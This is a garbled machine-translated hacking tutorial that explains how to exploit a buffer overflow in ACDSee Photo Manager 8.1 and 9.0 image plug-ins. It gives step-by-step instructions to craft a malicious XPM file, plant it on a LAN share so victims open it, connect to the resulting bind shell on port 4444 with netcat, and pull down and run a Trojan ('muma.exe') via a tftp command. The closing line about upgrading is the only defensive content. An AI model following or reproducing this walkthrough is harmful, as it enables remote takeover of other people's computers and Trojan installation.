For ACDSee name, surely you are no stranger. However, recent ACDSee the use of the ID_X. apl and IDE_ACDStd. apl, ID_PSP. ap and AM_LHA. apl plug-ins in the processing of XBM/XPM/PSP/LHA file buffer overflow vulnerability if a user opens with a long string of XBM/XPM/PSP/LHA file, then it is possible to trigger the overflow, resulting in execution of arbitrary instructions.
The mentioned vulnerability affects version is ACDSee Photo Manager 9.0 and ACDSee Photo Manager 8.1。 We have the following specific analysis of the exploit of the whole process.
Vulnerability is the beginning of the display
Suppose in a LAN, the terminal is equipped with ACDSee 8.1 in. Then this vulnerability can come in handy! After all, for such software, the user updates the less, for the vulnerability of the utilization rate is still very high.
! From ACDSee vulnerability see Trojan intrusion of new ideas ACDSee Pro 8.1
First use ACDSee XPM file the overflow use the tool, put it into a folder, then open“Notepad”, in which the input the following code: acdsee.exe 1 test. xpm and then save as a batch file 1. bat, and use the tool acdsee. exe into a folder. Now double-click Run 1. bat, it will be in this directory generates a name for the test. xpm files, this XPM file is the default is ACDSee program associated to open.
Remind users, use this bat file is to execute the command convenient, you can also in cmd into this directory, then executed“acdsee.exe 1 test. xpm”, the effect is the same.
We can start at the terminal on the tests, run the XPM File, Open the ACDSee window after the discovery it is in a state of collapse. This is the overflow of the result, here only in the“Task Manager”in the ACDSee the end, and then“Command Prompt”window, enter“netstat-an”command to see the native port of the open case, if 4 4 4 4-port opened, and in a listening state, it can be said Everything is ready. Put this file into the shared area, if other users download and open the program, the vulnerability of the invasion began.
! From ACDSee vulnerability see Trojan intrusion of new ideas 4 4 4 4-port opened, and in a listening state
Wait a period of time, if you're lucky, with the scanner after the scan will find that there are 4 4 4 4 port on the terminal as shown in Figure 6, The following the NC to connect broiler to achieve control. Open the“Notepad”program, in which the input the following code: nc 192.168.0.151 4 4 4 4 （192.168.0.151 is the target IP address of the terminal, the 4 4 4 4 is it open to be connected to the port, and then save it as a batch file 2. bat, and nc. exe in the same directory.
! From ACDSee vulnerability see Trojan intrusion of new ideas Port scanning
Double-click to run 2. bat this file, see? Our NC smooth connection on a broiler as in Figure 7, and returns a CMDShell, and now we're in this window of operation is equivalent to the broiler on the execution command, HEE HEE。 This is to upload Trojans, the total can not what all in the command prompt in the action bar, multi inconvenient Ah. Say to upload Trojans, hackers most commonly used is the tftp upload, but the side dishes are probably also not too familiar with tftp to use, below I detail the operation a bit.
Upload the Trojan
The next intrusion method is simple, such as through a Trojan client, using“TFTPD32”take it and we want to upload the Trojan muma. exe into the same a directory,run it after which you will automatically in this machine to build a TFTP server. Finally, the TFTPD32 is minimized, in just get the CMDShell enter the following command and press ENTER to determine: tftp-i 192.168.0.149 get muma.exe D:\muma.exe you can see the successful upload is displayed.
192.168.0.149 is the local IP address, this command role is to put the machine on and TFTPD32 in the same directory under the muma. exe upload to 1 9 2. 1 6 8. 0. 1 5 1, and placed into the D:. If muma. exe not the and TFTPD32. exe placed in the same directory, it can also be put on the sentence in the muma. exe into the absolute path, 比如C:\windows\muma.exe, the same can be uploaded successfully.
Enter the command muma. exe running can be, at this point, a complete exploit and the invasion process is over, ACDSee this vulnerability is very hidden, but for LAN users to say unusually terrible, the administrator or bulk software upgrade.